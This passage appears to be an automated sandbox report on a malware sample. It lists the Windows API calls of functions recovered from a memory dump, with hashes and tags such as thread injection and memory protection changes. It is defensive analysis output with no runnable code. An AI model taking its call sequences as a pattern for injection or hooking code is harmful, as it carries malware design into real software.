Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

FileTimeToLocalFileTime.KERNEL32(00000000,03741FD2), ref: 0374C209
FileTimeToSystemTime.KERNEL32(03741FD2,?), ref: 0374C217
FileTimeToLocalFileTime.KERNEL32(00000008,03741FD2), ref: 0374C320
FileTimeToSystemTime.KERNEL32(03741FD2,?), ref: 0374C32E

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Time$File$LocalSystem$AllocateHeap
String ID:
API String ID: 735003003-0
Opcode ID: e208865ed41117956be1415b99d37cbbf9c605655db34fe2baabd903b9249de6
Instruction ID: ece6e15859476bb9c0ab5c386717d168998ef29b8faa249389502169481674fb
Opcode Fuzzy Hash: e208865ed41117956be1415b99d37cbbf9c605655db34fe2baabd903b9249de6
Instruction Fuzzy Hash: 37711C72A0120AABCB51DBE9C884AEEB7FCAB09304F144066E545E7250E778EA45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0373E0A7, Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 0374A5E3: RegOpenKeyA.ADVAPI32(80000002,03754558,?), ref: 0374A5FE
Part of subcall function 0374A5E3: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 0374A64C
Part of subcall function 0374A5E3: GetProcAddress.KERNEL32(00000000,?), ref: 0374A665
Part of subcall function 0374A5E3: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0374A6B6

GetLastError.KERNEL32(?,?,?), ref: 0373E235
FreeLibrary.KERNEL32(?,?,?), ref: 0373E29D

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: 720f4080ff40faa342b764913e403a82a7d9edd92b1327741a3a392e28a5f112
Instruction ID: 1fd22fd33230cc2a4a12454728cfb4852d05980b548101f67d052c26d8b2f9db
Opcode Fuzzy Hash: 720f4080ff40faa342b764913e403a82a7d9edd92b1327741a3a392e28a5f112
Instruction Fuzzy Hash: B17119B6D0020AEFCF10DFE5C8889AEFBB9FF49304B148569E515AB651D731A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 03751E6D, Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,0000EA60,?,?,?,0373D793,00000000,0000EA60,00000000,00000000,037582C0,?,0373505E,?,?), ref: 03751E79

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

ResetEvent.KERNEL32(00000000,?,?,?,0373D793,00000000,0000EA60,00000000,00000000,037582C0,?,0373505E,?,?,00000000,037449EC), ref: 03751EF0
GetLastError.KERNEL32(?,?,?,0373D793,00000000,0000EA60,00000000,00000000,037582C0,?,0373505E,?,?,00000000,037449EC,?), ref: 03751F1D

Part of subcall function 037399C1: RtlFreeHeap.NTDLL(00000000,00000000,03750FDC,00000000), ref: 037399CD

GetLastError.KERNEL32(?,?,?,0373D793,00000000,0000EA60,00000000,00000000,037582C0,?,0373505E,?,?,00000000,037449EC,?), ref: 03751FDF

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 8e49b8db74910cd2e7f74c64000e1a5649df4ce12fc4048e82327a25a7ffe3df
Instruction ID: dc140f16704db6655aeb96d01998babe37d3c0d75cd372b772d522f83aabfeed
Opcode Fuzzy Hash: 8e49b8db74910cd2e7f74c64000e1a5649df4ce12fc4048e82327a25a7ffe3df
Instruction Fuzzy Hash: B24161B2500348FFDB29EFA1CC88EBB7BADEB04702B544929F902D5191D7B4DD458A20

Uniqueness

Uniqueness Score: -1.00%

Function 03733D34, Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON

Download Yara Rule

APIs

StrRChrA.SHLWAPI(?,00000000,00000023), ref: 03733D4E
StrChrA.SHLWAPI(?,0000005C), ref: 03733D75
lstrcpyn.KERNEL32(?,?,00000001,00000001), ref: 03733D9B
lstrcpy.KERNEL32(?,?), ref: 03733E3F

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: lstrcpylstrcpyn
String ID:
API String ID: 4154805583-0
Opcode ID: dc90e9d8874f0d0c1ee3bac7488186dd0b8da1bd65ddcb14a244d324758305fe
Instruction ID: 34c7645ffb723f8da3010d9240ebbff513639ff3a5a0dfabfafe30e155ec24eb
Opcode Fuzzy Hash: dc90e9d8874f0d0c1ee3bac7488186dd0b8da1bd65ddcb14a244d324758305fe
Instruction Fuzzy Hash: CB416276900259BFEB21EFA4CC84DEEBBFCEB0A250F0485A6F511E7141D7749A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03739889, Relevance: 6.1, APIs: 4, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,037486D0), ref: 0373989F
lstrlen.KERNEL32(?), ref: 037398D6

Part of subcall function 037399C1: RtlFreeHeap.NTDLL(00000000,00000000,03750FDC,00000000), ref: 037399CD

memcpy.NTDLL(00000000,?,?), ref: 03739958
memcpy.NTDLL(00000008,037543E8,00000002,00000000,?,?), ref: 0373996D

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 4125730466-0
Opcode ID: b2529dd77b610b8a3f56e5a67c998279f76e9e2de094e73cff0270038536a46e
Instruction ID: 107c50700183e4e2a5c545d9e564f07814cb2fd2db0a2e2d3bfd478b082724d3
Opcode Fuzzy Hash: b2529dd77b610b8a3f56e5a67c998279f76e9e2de094e73cff0270038536a46e
Instruction Fuzzy Hash: 59415076A00209EFCB14EF98CC84EAEB7FCEF45308B148459E959D7211D774EA05CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0373C427, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0373C455
ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0373C4DF
WaitForSingleObject.KERNEL32(00000064), ref: 0373C4ED
SuspendThread.KERNEL32(?), ref: 0373C500

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: d5e3ab660fdb8e5f3baab45c3c03ea45f34664ed905de3776f674de669ce94fc
Instruction ID: b791342fd97f71fe4c9a859e45b472bbf664c75c26e864ded487058bdf26fd1d
Opcode Fuzzy Hash: d5e3ab660fdb8e5f3baab45c3c03ea45f34664ed905de3776f674de669ce94fc
Instruction Fuzzy Hash: 6841D0B1108302EFE712EF50C840E6BBBE9FF89310F14492DFA8496161D772D954CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 03739A0D, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03731000: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0373100E

RtlAllocateHeap.NTDLL(00000000,?), ref: 03739A75
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03739AC6

Part of subcall function 03746CB1: GetLastError.KERNEL32 ref: 03746CFB
Part of subcall function 03746CB1: WaitForSingleObject.KERNEL32(000000C8), ref: 03746D20
Part of subcall function 03746CB1: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 03746D6B
Part of subcall function 03746CB1: WriteFile.KERNEL32(00000001,00001388,?,?,00000000), ref: 03746D80
Part of subcall function 03746CB1: SetEndOfFile.KERNEL32(00000001), ref: 03746D8D
Part of subcall function 03746CB1: CloseHandle.KERNEL32(00000001), ref: 03746DA5

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,?,?,?,03731722,?), ref: 03739AFB
HeapFree.KERNEL32(00000000,?,?,?,?,?,03731722,?), ref: 03739B0B

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: FileHeap$AllocateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID:
API String ID: 2457821452-0
Opcode ID: 3f7a40c22eb4efd3be70e0bab6e663643bb3d707b0199a344086f00277c2e21e
Instruction ID: adaa662f57e75a1ff67ede9050a0efa1087d258cfc1cfac501d3e51411b711bb
Opcode Fuzzy Hash: 3f7a40c22eb4efd3be70e0bab6e663643bb3d707b0199a344086f00277c2e21e
Instruction Fuzzy Hash: A7314B76900219FFDB08EFA4DC89CAEBBBDEB09340B148065F601D3154D7B5AE51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0373B8D0, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0373B90C
HeapFree.KERNEL32(00000000,00000000,?,0000001A,?,?,0373946A,?,?), ref: 0373B929
memcpy.NTDLL(?,?,0373946A,?,0000001A,?,?,0373946A,?,?), ref: 0373B94A

Strings

chun, xrefs: 0373B9C6

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: FreeHeapmemcpymemset
String ID: chun
API String ID: 2272576838-3058818181
Opcode ID: 95f826190d1b1296ed1cf59067822c47ec22a642690d8dd11f58ee133b4647d4
Instruction ID: 6127aab7e999915db2082b9041407952e336f5fa20669d329fbe17e18dec30db
Opcode Fuzzy Hash: 95f826190d1b1296ed1cf59067822c47ec22a642690d8dd11f58ee133b4647d4
Instruction Fuzzy Hash: 29319C32600705EFD724EF56DC84E26BBECEF5A210F08842AE959CB261E7B4E955CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0373D57C, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,037582C0,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0373D593
SetEvent.KERNEL32(00000000,?,?,?,037449EC,?,?), ref: 0373D5A3
GetLastError.KERNEL32 ref: 0373D62C

Part of subcall function 0373B758: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,03751F3B,0000EA60,?,?,?,0373D793,00000000,0000EA60,00000000), ref: 0373B773

Part of subcall function 037399C1: RtlFreeHeap.NTDLL(00000000,00000000,03750FDC,00000000), ref: 037399CD

GetLastError.KERNEL32(00000000), ref: 0373D661

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: c6caae795fcba0c460b28a33e2cf3886e91ec78f65dbd47e1a2a2dd9bfc6ca98
Instruction ID: b90b01051229e632288b610c9bcf88663873152ecd81541976f45a2ef195d726
Opcode Fuzzy Hash: c6caae795fcba0c460b28a33e2cf3886e91ec78f65dbd47e1a2a2dd9bfc6ca98
Instruction Fuzzy Hash: 4D3141B5D0030CEFDB30EFA5C884A9EB7F8EF49340F14456AE516A2241D7759A449F50

Uniqueness

Uniqueness Score: -1.00%

Function 037436DA, Relevance: 6.1, APIs: 4, Instructions: 83memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0374E184: memcpy.NTDLL(00000000,00000090,?,?,00000000,00000000), ref: 0374E1C0
Part of subcall function 0374E184: memset.NTDLL ref: 0374E241
Part of subcall function 0374E184: memset.NTDLL ref: 0374E256

RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 03743733
lstrcmpi.KERNEL32(00000000,?), ref: 0374375A
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 037437A1
HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 037437B2

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID:
API String ID: 1065503980-0
Opcode ID: 9e08ec94194063fc71f0e5075ec278e865c4f92e94ab9ab54287c74a2a879f8c
Instruction ID: d3f6ce2d6e3b6bd4eddd8a647a52b21b6ebd1006f25e842380b6eab7dab49142
Opcode Fuzzy Hash: 9e08ec94194063fc71f0e5075ec278e865c4f92e94ab9ab54287c74a2a879f8c
Instruction Fuzzy Hash: F7219E79A00309FFEB16FFA5DC88AAD7BB8EB08244F148064F508EB154D774A955DF50

Uniqueness

Uniqueness Score: -1.00%

Function 037424B6, Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0374A22F: StrChrA.SHLWAPI(00000001,0000000D,?,0373A380,00000000,?,00000001,00000000,00000001), ref: 0374A279

RtlAllocateHeap.NTDLL(00000000,01000000,00000001), ref: 0374251F
memcpy.NTDLL(00000000,?,00000007,?,?,?,03741015,00000000,?,0375807C,?), ref: 0374254C
memcpy.NTDLL(00000000,037580F0,037580F0,00000000,?,00000007,?,?,?,03741015,00000000,?,0375807C,?), ref: 0374255B
memcpy.NTDLL(037580F0,?,?,00000000,037580F0,037580F0,00000000,?,00000007,?,?,?,03741015,00000000,?,0375807C), ref: 0374256D

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: memcpy$AllocateHeap
String ID:
API String ID: 4068229299-0
Opcode ID: 0bd30b7a5187b50a0a7a6cadf75294bc4c7b34ab8fb57a15c76c0c9f526f03ca
Instruction ID: c8bdf1d5b192d7d0d9291413cda25bcf637fd0b8c2ce6e217cd2c83bec74bf55
Opcode Fuzzy Hash: 0bd30b7a5187b50a0a7a6cadf75294bc4c7b34ab8fb57a15c76c0c9f526f03ca
Instruction Fuzzy Hash: 81218E72900219FFDB20EF94CC84F9AB7ECEF05244F148091F904DB152E7B4EA519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03751A90, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(037582EC), ref: 03751AA6
RtlLeaveCriticalSection.NTDLL(037582EC), ref: 03751AC1
GetLastError.KERNEL32 ref: 03751B2F
GetLastError.KERNEL32 ref: 03751B3E

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 7ef90b5c465393514120a2c1f8fb6e0499f899489a4c31cc213e57fc05c60af9
Instruction ID: c6b9ffb9ece2127260b65c83230f13c1ca98e2f03b144da1a44d0947c33ffbe7
Opcode Fuzzy Hash: 7ef90b5c465393514120a2c1f8fb6e0499f899489a4c31cc213e57fc05c60af9
Instruction Fuzzy Hash: 88217A36900208EFCF19DFA8C804B9EBBB8FF08722B158155F81AA3210D7B5DA25DF51

Uniqueness

Uniqueness Score: -1.00%

Function 03747089, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 03737FC5: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,037470A0), ref: 03737FEB

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 037470DB
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,03734E98,?), ref: 037470ED
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,03734E98,?), ref: 03747105
CloseHandle.KERNEL32(?,?,?,?,?,?,03734E98,?), ref: 03747120

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: 8a940948707ccba82a33a97012d01a64172db5869ab31341e34c8baa92dbe7f5
Instruction ID: 07145017011129edb328173a2c8b86bb9f6f6fb5cfab342086ca3df869a8a581
Opcode Fuzzy Hash: 8a940948707ccba82a33a97012d01a64172db5869ab31341e34c8baa92dbe7f5
Instruction Fuzzy Hash: 58116071A01228BBDB24EFA6CC89EEFBE7CEF46790F144451F515E5054D3749A40CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 03749797, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?), ref: 037497CF

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

lstrcpy.KERNEL32(00000000,?), ref: 037497E6
StrChrA.SHLWAPI(00000000,0000002E), ref: 037497EF
GetModuleHandleA.KERNEL32(00000000), ref: 0374980D

Part of subcall function 03748FC7: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,?), ref: 0374909F
Part of subcall function 03748FC7: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,?,00000000,?,037545F0,0000001C,03745A26), ref: 037490BA
Part of subcall function 03748FC7: RtlEnterCriticalSection.NTDLL(03758380), ref: 037490DF

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: 7780b22f2c3379867c8f1f1e26c287c810959038186b0b4cf629c31038847a48
Instruction ID: f95eb0da7167ea53b6d106e54bf5035d1c1b129fb99094358fc79b27c116aade
Opcode Fuzzy Hash: 7780b22f2c3379867c8f1f1e26c287c810959038186b0b4cf629c31038847a48
Instruction Fuzzy Hash: 68217C35900309EFCB14DF69C848AAEBBF8FF46314F148069E54A9B251DB74E945EB10

Uniqueness

Uniqueness Score: -1.00%

Function 03734F06, Relevance: 6.1, APIs: 4, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

GetCurrentThreadId.KERNEL32 ref: 03734F3E
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,037336C6,00000000,?,00000000,00000000,03731AC4,?,?,?,?,?,03731AC4), ref: 03734F4A
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,037336C6,00000000,?,00000000,00000000,03731AC4), ref: 03734F58
lstrcpy.KERNEL32(00000000), ref: 03734F7A

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: FileTime$AllocateCurrentHeapNameSystemTempThreadlstrcpy
String ID:
API String ID: 282257550-0
Opcode ID: 4f306e6f7902897d56a73b691c1dc4f25b2a97237b7f06ffc0890e028e19d51d
Instruction ID: 73c1eae136ff658518fc011639d6d7917921dfef0e7cf73d993df5e9495c5b2f
Opcode Fuzzy Hash: 4f306e6f7902897d56a73b691c1dc4f25b2a97237b7f06ffc0890e028e19d51d
Instruction Fuzzy Hash: 6A01C433A00216BB9719EBA79C48D7B7BBCEBD2B4170D4115FA05E7105DBA4D8018BB0

Uniqueness

Uniqueness Score: -1.00%

Function 037353E8, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03743C6F,00000000,?,00000000,03740055,00000000,0375832C), ref: 037353F3
RtlAllocateHeap.NTDLL(00000000,?), ref: 0373540B
memcpy.NTDLL(00000000,?,-00000008,?,?,?,03743C6F,00000000,?,00000000,03740055,00000000,0375832C), ref: 0373544F
memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 03735470

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: da195278745f9b640e6639658bfd3c88ac8a824d1361a0119c3c51f2f6b1a5d1
Instruction ID: 95c6e4093c0879c5e9a06aab2a4a046e03deec47188b002dd9dbaab4d813c9e5
Opcode Fuzzy Hash: da195278745f9b640e6639658bfd3c88ac8a824d1361a0119c3c51f2f6b1a5d1
Instruction Fuzzy Hash: AE112972A00318BFC318DF6ADC88D9EBBEEDB82261B198176F505D7141E7B49E00D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0374BCB9, Relevance: 6.1, APIs: 4, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000008,037455C0,00000000,00000000,00000000,03754048,00000000,?,037336E2,00000020,00000000,?,00000000), ref: 0374BCC3

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,037336E2,00000020,00000000,?,00000000,?,00000000,00000000), ref: 0374BCEE
StrStrA.SHLWAPI(00000000,?,?,00000003,?,037336E2,00000020,00000000,?,00000000,?,00000000,00000000), ref: 0374BD0D
lstrcat.KERNEL32(00000000,?), ref: 0374BD45

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: AllocateHeaplstrcatlstrlen
String ID:
API String ID: 745444535-0
Opcode ID: 19ebc294c3362e4ee8dda0944fd903987cac4f93b894b5a88e5e278d4324ba2d
Instruction ID: 544f43ec9448c28406f3330317c7c459b7d09e77ee0009921225eb0b6c75ef92
Opcode Fuzzy Hash: 19ebc294c3362e4ee8dda0944fd903987cac4f93b894b5a88e5e278d4324ba2d
Instruction Fuzzy Hash: 1411C27720034AABD724EB65DC88E6BB7ECAF85345F0885A8F645D7104DB78EC49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0373C392, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 0373C39F
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 0373C3C5
lstrcpy.KERNEL32(00000014,?), ref: 0373C3EA
memcpy.NTDLL(?,?,?), ref: 0373C3F7

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: 3b1f276f4f5fa7968e75e41f8c383b8b92441a8b169e893908910615e27edfdc
Instruction ID: 48ec050bd0a67bda3bd256dff966d66a7aefa8347c931a72f4e28aa67eff70d8
Opcode Fuzzy Hash: 3b1f276f4f5fa7968e75e41f8c383b8b92441a8b169e893908910615e27edfdc
Instruction Fuzzy Hash: 6711797250030AEFCB21CF48D884A9ABBF8FB49304F14C46AF88A97211C375E904DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 037419AD, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 037419C0
lstrlen.KERNEL32(03758040), ref: 037419E1
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 037419F9
lstrcpy.KERNEL32(00000000,03758040), ref: 03741A0B

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: 136a5a9fefb92fe5efe07b5eeff6a67774bdcc07000cb6806901291a9727bcb8
Instruction ID: eb10ca1a0e2971a5eb8725f26cee948bf1d0c4a7ace3a88d415c6e4cbc2b35e0
Opcode Fuzzy Hash: 136a5a9fefb92fe5efe07b5eeff6a67774bdcc07000cb6806901291a9727bcb8
Instruction Fuzzy Hash: BA01C877A04348BBC715EBE9E888A5FBBBC9B49201F148065E90AD3245D774D545CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03748056, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,03757C8C,?,03754048,03741859,00000000,00000000,?,?,?,00000000), ref: 0374805D
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 03748075
memcpy.NTDLL(0000000C,?,00000001,?,00000000), ref: 0374808B

Part of subcall function 0373DAEF: StrTrimA.SHLWAPI(00000000,03754510,00000000,?,03750E90,?,00000020,03758320), ref: 0373DB33

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000,?,00000000), ref: 037480BD

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateFreeTrimlstrlenmemcpy
String ID:
API String ID: 3208927540-0
Opcode ID: 09de24aca26876b4521481ee81ce2c221b19519db866ccd92d857ee6141fc933
Instruction ID: 4f6c70cf427e30240a114b6b8ad3d58fcf980d9aa18fc55a5eb3b7998d6d038f
Opcode Fuzzy Hash: 09de24aca26876b4521481ee81ce2c221b19519db866ccd92d857ee6141fc933
Instruction Fuzzy Hash: 6901F73620030EFBD335AF11EC88F27BAA8EB80750F048025F5099B190D7A5A8459762

Uniqueness

Uniqueness Score: -1.00%

Function 037477EE, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(037583A8), ref: 037477F9
Sleep.KERNEL32(0000000A,?,?,03740FF4,00000000,?,037580F0), ref: 03747803
SetEvent.KERNEL32(?,?,03740FF4,00000000,?,037580F0), ref: 0374785A
RtlLeaveCriticalSection.NTDLL(037583A8), ref: 03747879

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: e034d4fc8b38c856f957afb1722526e6308f50c450dbdbb2eef4b17a5247590d
Instruction ID: 588ce9d25ba41a02aa9dc392d2af1ff892a0d710c38753c8ddcac304bdc3379d
Opcode Fuzzy Hash: e034d4fc8b38c856f957afb1722526e6308f50c450dbdbb2eef4b17a5247590d
Instruction Fuzzy Hash: 9801B571740348FBE718FBA1DC49F593AACFB04712F108061F60ADA184D7F8A940DB62

Uniqueness

Uniqueness Score: -1.00%

Function 03746F0C, Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(03757FE0,00000000), ref: 03746F18
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 03746F33
lstrcpy.KERNEL32(00000000,?), ref: 03746F5C
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 03746F7D

Part of subcall function 03734466: SetEvent.KERNEL32(?,?,03749C40), ref: 0373447B
Part of subcall function 03734466: WaitForSingleObject.KERNEL32(?,000000FF,?,?,03749C40), ref: 0373449B
Part of subcall function 03734466: RtlEnterCriticalSection.NTDLL(?), ref: 037344B6
Part of subcall function 03734466: RtlLeaveCriticalSection.NTDLL(?), ref: 037344CE
Part of subcall function 03734466: LocalFree.KERNEL32(?), ref: 037344F5
Part of subcall function 03734466: RtlDeleteCriticalSection.NTDLL(?), ref: 037344FF

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID:
API String ID: 3339210832-0
Opcode ID: bcce4f85a6c028eff9ef6347c1da3e05b065b2897f99784b679e5e468853ddf7
Instruction ID: 8065cc95dbec2c89de6ff524cdfa008f220a15c46c108d09747461b8ba8d4bf4
Opcode Fuzzy Hash: bcce4f85a6c028eff9ef6347c1da3e05b065b2897f99784b679e5e468853ddf7
Instruction Fuzzy Hash: 1EF0A437740310F7D67CB762AC0DF473A58DB46B61F148064F608DB1C4DAE89842C760

Uniqueness

Uniqueness Score: -1.00%

Function 0373DDB0, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00001000), ref: 0373DDC2

Part of subcall function 03746CB1: GetLastError.KERNEL32 ref: 03746CFB
Part of subcall function 03746CB1: WaitForSingleObject.KERNEL32(000000C8), ref: 03746D20
Part of subcall function 03746CB1: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 03746D6B
Part of subcall function 03746CB1: WriteFile.KERNEL32(00000001,00001388,?,?,00000000), ref: 03746D80
Part of subcall function 03746CB1: SetEndOfFile.KERNEL32(00000001), ref: 03746D8D
Part of subcall function 03746CB1: CloseHandle.KERNEL32(00000001), ref: 03746DA5

